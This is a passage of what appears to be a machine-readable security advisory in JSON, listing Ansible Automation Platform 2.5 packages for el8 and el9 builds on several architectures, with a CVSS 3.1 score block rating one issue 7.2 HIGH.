"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
